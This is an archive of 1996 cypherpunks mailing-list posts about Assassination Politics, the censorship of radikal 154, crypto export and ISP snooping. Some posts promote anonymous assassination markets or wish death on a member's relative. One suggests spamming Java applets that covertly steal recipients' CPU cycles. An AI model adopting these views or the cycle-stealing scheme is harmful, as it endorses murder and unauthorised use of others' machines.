>NNTP-Posting-Host: oak.math.ucla.edu
>
>Do you wonder what happens to civilians unwilling to lie down for
>police abuse of power?  Daniel Allan Tuffree, 49, a former high school
>teacher, the testimony in whose trial ended yesterday, has been charged
>with first-degree murder in the shooting death of Officer Michael Clark
>13 months ago, after three warrantless police officers traipsed on his
>front lawn with their guns drawn -- to check on his welfare.  The case,
>which is presided over by the notoriously prosecution-friendly Judge
>Allan L. Steele in the Simi Valley courthouse that hosted the acquittal
>of Rodney King's uniformed assailants in their first trial, will go to
>the jury in early October after jury instructions are drawn and lawyers
>make their closing arguments.  Tuffree faces a possible death sentence.
>
>Clark was one of three police officers sent to Tuffree's home on
>August 4, 1995, after reports that the former Chatsworth High School
>teacher had been drinking alcohol, taking Valium and was possibly
>suicidal.  A gunfight began shortly after police walked into Tuffree's
>backyard and started asking him questions, refusing his order to leave
>his property.  Defense attorneys have argued that Clark fired on
>Tuffree first and that police acted improperly. They called expert
>witnesses who testified that police should have walked away once they
>realized that Tuffree was not hurt or suicidal.
>
>Lou Reiter, a retired Los Angeles Police Department commander,
>testified that Simi Valley police officers made one mistake after
>another when they came to Tuffree's home.  According to Reiter's
>testimony, the three police officers were working with third-hand
>information when they arrived at the scene.  Before taking action,
>they did not devise a plan in case a confrontation occurred with
>Tuffree, who was a known gun owner.  And they did not announce
>themselves before walking into Tuffree's backyard with their guns
>drawn, all actions that could have aggravated a distraught man who
>reportedly had been drinking alcohol, taking Valium and who had
>stopped answering his phone.  "No one had anticipated or made an
>evaluation of what would happen if things didn't go right," said
>Reiter, a private consultant on police procedure who was an LAPD
>officer for 20 years.  He also told the jury that he believed Simi
>Valley Police Sergeant Anthony Anzilotti to have been negligible in
>his role as the supervising officer on scene that day, testifying that
>"in [his] opinion [Anzilotti] didn't supervise at all."  And he said
>Clark erred by not walking away from Tuffree's kitchen window once he
>realized the former schoolteacher was conscious and not injured: "The
>emergency is over; therefore, the right to be in his backyard is
>over."
>
>Reiter denied the claims of two other police experts called by the
>prosecution, both of whom testified that Simi Valley police officers
>sent to Tuffree's house last summer had a "moral, ethical, and legal"
>obligation to follow through with the request to check on Tuffree's
>welfare, having no choice but to get close enough to make direct
>contact with Tuffree in order to ensure that he was safe.  But Reiter,
>who retired from the LAPD in 1981, said that "officers always have a
>choice," explaining that there are situations in which police can walk
>away once they have determined that a person is safe.  "There are a
>lot of people in their homes that are not confronting a medical
>emergency who just want to be left alone," he said.
>
>See http://www.latimes.com/HOME/COMMUN/NEWS/ZONE26B for more information.
>
>Cordially, - Mikhail | God: "Sum id quod sum." Descartes: "Cogito ergo sum."
>Zeleny@math.ucla.edu | Popeye:   "Sum id quod sum et id totum est quod sum."
>itinerant philosopher -- will think for food  ** www.ptyx.com ** MZ@ptyx.com
>ptyx ** 6869 Pacific View Drive, LA, CA 90068 ** 213-876-8234/874-4745 (fax)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 25 Sep 1996 04:14:45 +0800
To: cypherpunks@toad.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <3.0b24.32.19960924064658.006b3540@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 PM 9/23/96 -0700, tcmay@got.net (Timothy C. May) wrote:
>At 2:10 AM 9/24/96, hallam@vesuvius.ai.mit.edu wrote:
>
>>like Markof are somewhat more responsible. This is not going to stop me
>>from producing an op-ed piece linkiing the net libertarians to assasination
>>politics unless I hear a few more repudiations of Bell's ideas. If you
>>don't very clearly reject his murderous ideas you are going to regret it
>>just as the left regreted having the USSR or the RAF associated with them.
>
>I for one don't respond well to extortion threats, so write your damned
article.

Anyone who mistakes the lack of "repudiations" for AP on the list for some
kind of tacit approval is not getting the whole picture, IMHO.  

Is this how journalists do their research nowadays -- "give me some info or
I'll write something really bad about you that you'll regret?"  Cool.  I
guess I thought there might still be some kind of pursuit of the truth
involved.

I personally don't have the time or energy to contribute to the AP threads.
That != approval for the idea.

I hope you include your above quote in your piece.



Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 25 Sep 1996 02:05:43 +0800
To: sameer@c2.net
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <199609232122.OAA15542@atropos.c2.org>
Message-ID: <Pine.SUN.3.91.960924065554.2298A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I agree with Sameer -- I don't think Germany wins.

The information is still online. A quick Altavista search will take you to
it. The mirror sites' continued existence forces Gemany's hand; now
they'll have to try and block the rest of the sites. 

-Declan


On Mon, 23 Sep 1996 sameer@c2.net wrote:

> > Unfortunately, this means that Germany wins.
> 
> 	How does this mean that Germany wins? "radikal 154" is still
> available all over the world, at almost 50 mirror sites, I beleive
> (including http://www.c2.net/radikal/), which are *not* blocked by
> Germany.
> 
> -- 
> Sameer Parekh					Voice:   510-986-8770
> C2Net						FAX:     510-986-8777
> The Internet Privacy Provider
> http://www.c2.net/				sameer@c2.net
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Sep 1996 03:18:52 +0800
To: Hamish <haggis@brutus.bright.net>
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <v01540b00ae6c79f1fbfd@[205.212.124.167]>
Message-ID: <3247E9CF.568D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Hamish wrote:
> Soon I am going to be going overseas to Japan, and I want to take
> my notebook with me so I can keep up with everything, however, I have
> encrypted my hard drive and usually encrypt my mail.  Is this in
> violation of the ITAR to keep everything the same when I go over?

Bad enough now that many places require you to put your laptop computer 
through the big gray x-ray machine (no exceptions in some places, 
especially federal buildings in the U.S.), but if they start requiring 
you to list individual files (?????).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Sep 1996 02:47:13 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <199609240135.SAA23298@mail.pacifier.com>
Message-ID: <3247EF0D.6D1D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 05:48 PM 9/23/96 -0400, hallam@vesuvius.ai.mit.edu wrote:
> >So Jim Bell is opposed to "truly random attacks on ordinary citizens"
> >Its this type ofappoligia for terrorism that disgusts me utterly.
> >He is calling for murder but wants to dress it up in whatever
> >psychotic justifications he can.
> >He is also completely wrong. When the IRA attemoted to assasinate my 
> >cousin I was in no way intimidated and neither was he. He continued
> >as a senior poitician for over a decade despite continued danger. I
> >can think of no less effective method of bringing about change in
> >attitudes. And he, along with others, failed to solve the problems as 
> >well.  Is this progress?
> >I am in no way intimidated by Bell either. He is a kook and I don;t
> >think it he is worth further consideration.

> For the record, if an AP-type system were to operate it would:
> 1.  Make it impossible for the British to continue to station troops
> in Northern Ireland, an eventuality that I suppose Phill resists.
> However, it would also:
> 2.  Make it impossible and unnecessary for the British to have any
> troops anywhere, because it would eliminate  its government and
> military.  It would no longer be a country, merely an island with 
> people living there.
> 3.  Make it unnecessary in Northern Ireland to protect the Catholics 
> from
> the Protestants, or the Protestants from the Catholics,  because the
> trouble-makers from both (all?) sides would be quickly erased from the
> scene.  Nobody would rule anybody. Nobody COULD rule anybody.  All
> factions would either be peaceful or dead, their choice.  No political 
> advantage could be gained by violence, because all politics would have 
> ceased.
> 4.  Make it unnecessary and pointless for Northern Ireland to re-unify 
> with
> Ireland, because likewise the government and military of Ireland would
> dissolve, as well as all political structure in that land as well.
> In short, the only reasons that the current problems are maintained in
> Northern Ireland and Britain would be eliminated by the advent of AP.
> So who is the "kook," really?

Lessee if I have this right, now.  We have basically three scenarios:

1. Allow the status quo to continue (the justice system scam now run by
   Janet Reno/Louis Freeh types et al.
2. Allow the people some democracy in applying justice through AP.
3. Sometime in the future, build the Gort(?) robots, as in The Day The
   Earth Stood Still, and let them do the job.

Whatcha think?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 24 Sep 1996 23:03:48 +0800
To: Adam Shostack <rp@rpini.com (Remo Pini)
Subject: Re: Where to write crypto?
Message-ID: <3.0b19.32.19960923075911.00bd74d4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:24 AM 9/23/96 -0500, Adam Shostack wrote:
>Switzerland is not the most liberal (libertarian) of countries.
>Getting a work permit can be very tough.  However, there are crypto
>companies and research groups.  Haeglin and ETH-Zurich (ETH is Swiss
>Federal Institute of Technology) spring to mind.
>
>Adam

One does not need a work permit to travel around Europe staying in various
places and writing crypto.  Work permits only apply to residents.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 24 Sep 1996 23:39:19 +0800
To: sunder@brainlink.com
Subject: Banning annoying users
Message-ID: <199609241158.HAA27269@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


The
not allowing unsubscribed individuals to post is logical, for a time.  But
that basically outlaws anon remailers that don't allow you to send to an
account, and a lot of them don't, from my limited understanding.  Besides, if
we set up the list to ban people who are 'undesirable', instead of just using
our own killfiles to do the dirty work for the list, then what is to stop
someone from banning you?  Sure, you move on to another list, but, personally,
I wouldn't want it done to me, and so I would not do it to someone else.  But,
like I said, personal killfiles are more than encouraged.  It resolves these
kinds of conflicts a lot faster and cleaner than debating who and who should
not be banned.

---
Daniel.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "StarNine Sales Service" <sales@starnine.com>
Date: Wed, 25 Sep 1996 04:07:02 +0800
To: "StarNine Sales Service" <sales@starnine.com>
Subject: Reminder on your eval software
Message-ID: <n1368568483.*3206@emod.starnine.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Macintosh User,

Thank you for your interest in our free evaluation software. We hope that 
you're enjoying working with one of our award-winning Macintosh server
products such as WebSTAR, ListSTAR or Quarterdeck Mail. We're sending  
this message to you as a quick reminder that the serial key for your 
evaluation copy will expire in approximately three weeks.

If for any reason you were unable to successfully download the requested 
file, we urge you to try downloading again at:
<http://www.starnine.com/retry/>.

Once you've begun using our software, you should enjoy easy installation and 
administration.  If you experience any difficulties, please consult one of 
our useful on-line support resources such as our FAQ pages or technical 
notes at <http://www.starnine.com/support/>. Of course, you can always 
receive a personal reply to your questions by sending e-mail to 
support@starnine.com.

After you've had a chance to evaluate whether the program meets the 
needs of your organization, we urge you to call our sales office at 
1-800-525-2580 or (510) 649-4949, or send mail to sales@starnine.com 
for information regarding pricing and availability. Products may also be 
purchased via our on-line store: <http://store.starnine.com/>

You may want to evaluate one of our other products we offer:

* WebSTAR - for easily creating and maintaining dynamic Web sites on 
your Macintosh. WebSTAR recently won "Software Product of the Year" 
and "Editor's Choice" award, and now includes Adobe Pagemill for easy 
Web page creation.
<http://www.starnine.com/webstar/>

* ListSTAR - allowing you to publish email on the Internet. Create your 
own powerful email discussion groups and Email-On-Demand services, 
including easy Web site integration.
<http://www.starnine.com/liststar/>

* Quarterdeck Mail (formerly Microsoft Mail for AppleTalk Networks).  
The easiest client-server email system for Mac networks, now includes
one-click browser URL-launching, internet-style signatures and more!
<http://www.starnine.com/mail/>

* Mail*Link Gateways - connect Quarterdeck Mail or QuickMail to the 
Internet or Unix systems via the UUCP or SMTP protocols.  Please call 
(800) 525-2580 or mail sales@starnine.com for evaluation copies.


Thank you again for your interest in our products.

Sincerely,
StarNine Technologies, a Quarterdeck Company

--------------------------------------------
Phone: 1-800-525-2580
FAX: (510)-548-0393

<http://www.starnine.com/>                       2550 Ninth Street, Suite 112
<email: sales@starnine.com>                        Berkeley, CA 94110






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Vagner <jlv@signet.sig.bsh.com>
Date: Wed, 25 Sep 1996 00:12:16 +0800
To: cypherpunks@toad.com
Subject: Re: Snooping ISP admin??
In-Reply-To: <199609232112.QAA07155@xanadu.io.com>
Message-ID: <Pine.SGI.3.95.960924083458.29289C-100000@www>
MIME-Version: 1.0
Content-Type: text/plain



> > Question for the group:  I have encountered a situation that causes me
> > to believe an ISP is snoopingthrough encrytped mail.  It seems that
> > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> > encountered "POP3 account in use by another user" several times in the
> > past few days and I am the only user... wondering if that "in use"
> > messsage is the result of a clumsy sysadmin being caught with his hand
> > in the cookie jar.  Any thoughts from the group???  If those more
> > knowledgeable than I deem these NOISE... my sincere apologies.
> 
> An admin could just copy the mail spool file to a safer place, then read
> through at their leisure.
> 
> Unless its someone totally clueless (which some ISP's are), I doubt that
> they are pulling off the pop3d.  It could be that your mail spool file is
> locked by a mail transport agent, and that is why that error message is
> occuring.
> 
> Any thoughts?

As someone who has operated an ISP himself, I would say that the
likelihood of this being a system problem is very high. Especially if this
is a relatively new ISP, or if they've upgraded anything at all on their
mail server, it's pretty easy to break the delicate balance of daemons and
permissions such that this problem could easily occur.

It's worth a call to their technical support line (I know.. I'm sure it's
always busy) just to inform them of the problem. Sometimes it'll time out
(if it's one kind of problem) and sometimes it'll hang there until a lock
file is specifically removed (a different kind of problem).

All other comments regarding the likelihood that a sysadmin would try to
read mail in the real environment apply. 

Jason





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 25 Sep 1996 01:46:26 +0800
To: cypherpunks@toad.com
Subject: Bork book
Message-ID: <3247E5B8.6181@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Bork was on NBC (I think) being interviewed to plug his hot
new book "Slouching Towards Gomorrah" (or something like that).  The
snippet of interview I caught was the last part, with the interviewer
asking how Bork could reconcile his desire that we all be more free
with his notion that we let the Constitution "control" us, and that
legislatures should be able to outlaw all the profanity and indecency
that they want.

Any of the cypherpunk.lawyers seen this?

Bork came across as kind-of a jerk, personality-wise.
-- 
______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Wed, 25 Sep 1996 01:55:55 +0800
To: cypherpunks@toad.com
Subject: Re: Previous disk erasing thread
Message-ID: <Pine.BSI.3.91.960924090441.18346B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Thu, 05 SEP 1996 10:23:32 -0700 
To: Steve Harris <steveh@net-services.compulink.co.uk>
Newgroups: alt.security
Subject: Re: Security Disk Washer 

Steve Harris wrote:
> 
> When  you delete files, you  don't really remove the data. DOS  simply
> marks  the  area as available for overwriting by new  data.  Sometimes
> this is useful - the "Undelete" program exploits this to allow you  to
> recover  accidentally  deleted files. On other occasions,  this  is  a
> security  risk  - you want to prevent people  recovering  confidential
> data.
> 
> This program stops people recovering the data. It wipes all the unused
> disk area with random data. This technique provides "after the fact"
> protection. Imagine putting all your old confidential documents in a
> trash can. "Washer" shreds all the documents in the trash.
> 
> Download your free copy from
> http://www.compulink.co.uk/~net-services/wash/
> 
> Steve Harris - Net Services - Making E-Mail privacy easy
> with PGP.  http://www.compulink.co.uk/~net-services/pgp/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 25 Sep 1996 04:16:47 +0800
To: cypherpunks@toad.com
Subject: Re: AP [was kiddie porn on the net] [noise]
Message-ID: <199609241613.JAA20109@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Phill states:

> I do support the presence of troops in Northern Ireland and
>do not consider that to contradict my belief that there should be
>a united, autonamous Ireland. I do not believe that the
>"loyalists" are in fact loyal to the British way of life, any more
>than the KKK are representative of the US south.

 Do as you like. Regrettably as long as there are British troops in
Ireland, Britain will continue to encounter the occasional "Irish
Cruise Missile."

As several people have already pointed out, the solution is
obvious.

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 25 Sep 1996 02:35:32 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: provably hard PK cryptosystems
In-Reply-To: <Pine.HPP.3.91.960923182407.12499B-100000@cor.sos.sll.se>
Message-ID: <3247ECCA.7743@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland wrote:
> writing a cycle stealing Internet java app...

And remember, you can do that simply by putting your applet in an
HTML document and then spam-mailing the document with appropriate 
MIME header information to zillions of people.  Everybody who's
reading mail with Netscape (and maybe IE) will see your little
HTML document (which needn't be anything special), and your applet
will be able to fire up and start stealing cycles.

In fact, it'd be cool to set up a mail sender that would construct
such a page automatically with each outgoing mail message.  That
way, ordinary postings to mailing lists would go out with that spiffy
HTML look, and you'd get all those CPU cycles without angering the
community (much).
-- 
______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KM5Y75088@aol.com
Date: Wed, 25 Sep 1996 01:24:30 +0800
To: cypherpunks@toad.com
Subject: crypto help..system help
Message-ID: <960924092527_484293026@emout03.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I am tryint to get involved with crypto and have had a long-distance helper
but we are having problems getting our 3.1 based system working with win 95.
Uses a GUI programmed in 16 bit visual basic. Need someone willing to come
over and help . Dallas area zip 75030 or 75088.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Wed, 25 Sep 1996 02:08:00 +0800
To: cypherpunks@toad.com
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <199609241328.JAA12601@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i was under the impression that germany's goal was to stop the distribution
of radikal 154 by xs4all, not by 50 mirror sites.  they seem to have 
accomplished their goal. do you really think that they will let a little
thing like reason stand in their way when claiming victory?

	-paul

> From cypherpunks-errors@toad.com Tue Sep 24 06:43:51 1996
> From: sameer@c2.net
> Subject: Re: We removed radikal 154 from xs4all :(
> To: tcmay@got.net (Timothy C. May)
> Date: Mon, 23 Sep 1996 14:22:40 -0700 (PDT)
> Cc: tank@xs4all.nl, cypherpunks@toad.com
> X-Mailer: ELM [version 2.4 PL24 ME8a]
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset=US-ASCII> 
> Content-Transfer-Encoding: 7bit
> Sender: owner-cypherpunks@toad.com
> Content-Length: 397
> 
> > Unfortunately, this means that Germany wins.
> 
> 	How does this mean that Germany wins? "radikal 154" is still
> available all over the world, at almost 50 mirror sites, I beleive
> (including http://www.c2.net/radikal/), which are *not* blocked by
> Germany.
> 
> -- 
> Sameer Parekh					Voice:   510-986-8770
> C2Net						FAX:     510-986-8777
> The Internet Privacy Provider
> http://www.c2.net/				sameer@c2.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 25 Sep 1996 07:57:00 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Where to write crypto?
Message-ID: <v02130500ae6d5aa9e163@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I believe Taiwan might be an excellent location to have 'clear room' crypto
work done.  Taiwan has a very large skilled software labor pool and isn't a
member of COCOM.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Wed, 25 Sep 1996 03:16:11 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <wNZPuD1w165w@bwalk.dm.com>
Message-ID: <Pine.SOL.3.93.960924093951.2049C-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> 
> U.S. public school system is darwinian evolution in action. Parents who can
> afford to send their kids to private schools, do so. Parents who send their
> kids to public schools deserve to have their offsprings fucked up, mentally
> and phsyically, to improve the species' gene pool.

But the cutoff is often whether the parents can afford to send their kids
to private school, not whether or not they're genetically superior.

And the reason it costs so much to send a kid to private school is that
everyone's already paying for a more expensive public school thanks to all
the taxes.

> There are plenty of excellent private elementary and secondary schools in the
> U.S. Children who deserve better schooling (by virtue of having parents who
> have better genes and are therefore economically successful) get it.

So if I'm economically successful it'll change my genes?

I guess this is the famous Russian belief in Lamarkianism in action.


Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Wed, 25 Sep 1996 02:59:02 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <6XJquD10w165w@bwalk.dm.com>
Message-ID: <Pine.SOL.3.93.960924095211.2049E-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> There is no such thing as an "ordinary citizen". When the U.S. commits
> war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere,
> every American taxpayer is an accomplice and a fair game. Likewise, any
> Britih subject is fair game for IRA's self-defense against centuries of
> British genocide and oppression.

Are you aware that from the _American_ point of view, we suffered from
Russian war crimes in Korea and elsewhere? Where are the POW's that are
missing from that war? 

> 
> It's a pity the IRA didn't nail your cousin. I wish them better luck next time.
> 

If I were you I wouldn't advocate murder based on nationality; there are
lots of swamps in this state that can decompose bodies completely in six
months. Even the bones are gone.

Phil Fraering
pgf@acadian.net            
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 25 Sep 1996 06:58:03 +0800
To: cypherpunks@toad.com
Subject: Re: AP Protocol Failures [NOISE]
Message-ID: <199609241701.NAA16848@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


>> 	Troops are in Northern Ireland for a very simple and depressing
>> reason. People like Jim want to impose their will on others by force.

People have been imposing their will on others in Ireland for 800 years,
and killing off the more prominent members of the opposition has been
a long-term policy of the thugs who've been doing it.  Today there are
at least three competing gangs of thugs trying to impose their will on
others by force.   The Protestants are afraid that the Catholic majority
on the island will enforce their rule on them, and the Catholics in the north
are afraid that the Protestants will enforce their rule on them,
both with good reason as near as I can tell.  At least a few years ago,
the IRA were spouting Marxist rhetoric and wanted to impose their
Marxist thuggery on the whole island.  The Queen's Empire's army
understands AP better than the IRA does - they know the IRA's
happy to kill Imperial soldiers who wander around unprotected.
On the other hand, the IRA are a bunch of murdering thugs who
blow up pubs and non-combatants as well as targeting soldiers.
Some of the pro-Saxon Orangeheads do the same, of course,
though most of them mainly like to have parades in Catholic
neighborhoods to say "Nyahh, nyahh, we still rule you peons."
The atrocities that the IRA and Brits commit against each other
are both unsupportable, and lead to more conflict rather than peace,
but neither side has the high moral ground to complain about it. 

But AP is great - adding more violence to Ireland is just the thing
they need........

One of the strong negatives of AP is that it leads to reverse AP -
if you don't know _which_ Hatfield killed the latest McCoy, 
you might as well just shoot one or two Hatfield Boys at random.  
If you kill off GrandDaddy Hatfield, there's nobody to say 
"OK, let's stop shooting each other"; instead there's a bunch of 
angry grandkids, and uncles, _all_ of whom have the
authority to say "Let's go kill the McCoy bastards who did this!"
The protocols may work when there's one hierarchical target -
they don't work with two.  Hammurabi's law about "An eye for an eye
and a tooth for a tooth" was a _limitation_ on the amount of vengeance
you were allowed to take, not a minimum required vengeance.


jonathon <grafolog@netcom.com> wrote:
>	Do that op-ed piece --- but remember that AP is not a libertarian
>	position. Libertarian's think that government is a good thing.
>	AP thinks that government is a bad thing, and their philosophical
>	differences get wider, from there.

Libertarians have varying opinions about government; some of us
are anarchists, while some are minarchists.  Most of us figure that
once we've gotten rid of the first 90% of government, we can 
haggle about the rest of it then, in a much freer society,
where people will have different perspectives on what stupid and obnoxious
things they want the government to stop doing next.  And if the
well-intentioned-but-misguided minarchists prevail, it'll still be
far better than today :-)

Assassins, on the other hand, are generally on power trips -
I don't see that replacing power-tripping wholesale murderers
with lots of power-tripping retail murderers is really a good thing.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Tue, 24 Sep 1996 19:18:14 +0800
To: sameer@c2.net
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <199609232122.OAA15542@atropos.c2.org>
Message-ID: <Pine.LNX.3.95.960924102718.1477A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996 sameer@c2.net wrote:

> 	How does this mean that Germany wins? "radikal 154" is still
> available all over the world, at almost 50 mirror sites, I beleive
> (including http://www.c2.net/radikal/), which are *not* blocked by
> Germany.
 ^^^^^^^^^
ICTF members blocked the site. (?) (Non-members didn't block it.)

They brought one server down, which they didn't like.
So 'they' think, they won. That's the only important thing.

Hmm. Did they stop blocking the ip ? I have access.

-stephan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clint Barnett <cbarnett@eciad.bc.ca>
Date: Wed, 25 Sep 1996 06:32:59 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: crypto anarchy vs AP
In-Reply-To: <3.0b19.32.19960923225428.00b29a50@panix.com>
Message-ID: <Pine.SGI.3.91.960924104211.28479A-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain


 
exactly my point.

clint barnett
emily carr institute

On Mon, 23 Sep 1996, Duncan Frissell wrote:

> At 11:26 AM 9/23/96 -0700, Clint Barnett wrote:
> 
> >ever read "1984"? the appearance of a free lifestyle is most definitely 
> >not a free lifestyle. I am hardly a friend of the state, and far from 
> >being an advocate of the church, but multinational corporations running 
> >the world for their own fun and profit makes my sphincter clench. 
> 
> The lifestyle in "1984" didn't appear free.  Someone who thinks that an
> institution like the government that gains all its revenue by force and is
> armed with nukes is less dangerous than institutions that are shrinking in
> size and gain most of their revenue by voluntary exchange is nuts.
> 
> DCF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clint Barnett <cbarnett@eciad.bc.ca>
Date: Wed, 25 Sep 1996 07:19:51 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: crypto anarchy vs AP
In-Reply-To: <199609240700.AAA16178@mail.pacifier.com>
Message-ID: <Pine.SGI.3.91.960924104921.28479B-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain



if I'm not mistaken, large companies are able to purchase (in a way) 
government support. Special interest groups and large lobbying groups are 
also able to sway the government with either money , votes or things more 
insidious. You are absolutely right, big companies do get bigger because 
of (partly) government support of some form, but that's because they can 
afford to pay for it. 

clint barnett
lord of the cosmos
emily carr institute

On Tue, 24 Sep 1996, jim bell wrote:

> At 11:26 AM 9/23/96 -0700, Clint Barnett wrote:
> 
> >>to create the appearance of as free a life style as they can for
> >>individuals
> >
> >ever read "1984"? the appearance of a free lifestyle is most definitely 
> >not a free lifestyle. I am hardly a friend of the state, and far from 
> >being an advocate of the church, but multinational corporations running 
> >the world for their own fun and profit makes my sphincter clench. 
> 
> I think you're under a mis-impression here.  At least in the libertarian 
> circles where I do most of my political discussion, it is generally 
> suspected that corporations grow large and powerful primarily BECAUSE OF 
> assistance by and due to the policies of government.  (heavy regulation 
> favors large companies by keeping down small competitors, etc)  Of course, 
> that cause/effect relationship is intentionally hidden, and most of the 
> public sees the show put on which appears to have the opposite effect:  
> Anti-trust lawsuits, etc.  
> 
> Over time, the public is gulled into the false belief that if you get rid of 
> the government, you get rid of the "only think that stands between us and 
> the multi-national corporations."  They believe this because the only 
> government actions they see and recognize are anti-corporation.  If they 
> were aware of the truth, they'd realize that these large corporations are 
> actually afraid of a free market, and that the companies consider big 
> government to be their friends..
> 
> Just look at an excellent example:  Intel versus IBM.  Intel used to be this 
> tiny upstart chip company from the Bay area and IBM was smokestack America.  
> Now, Intel is the biggest (by dollar volume, anyway) chip company in the 
> world and IBM is, well, considerably cut back from its heyday.  At least in 
> hindsight, IBM would have been "smart" to squash Intel, or buy it up, or 
> have the government over-regulate it.  
> 
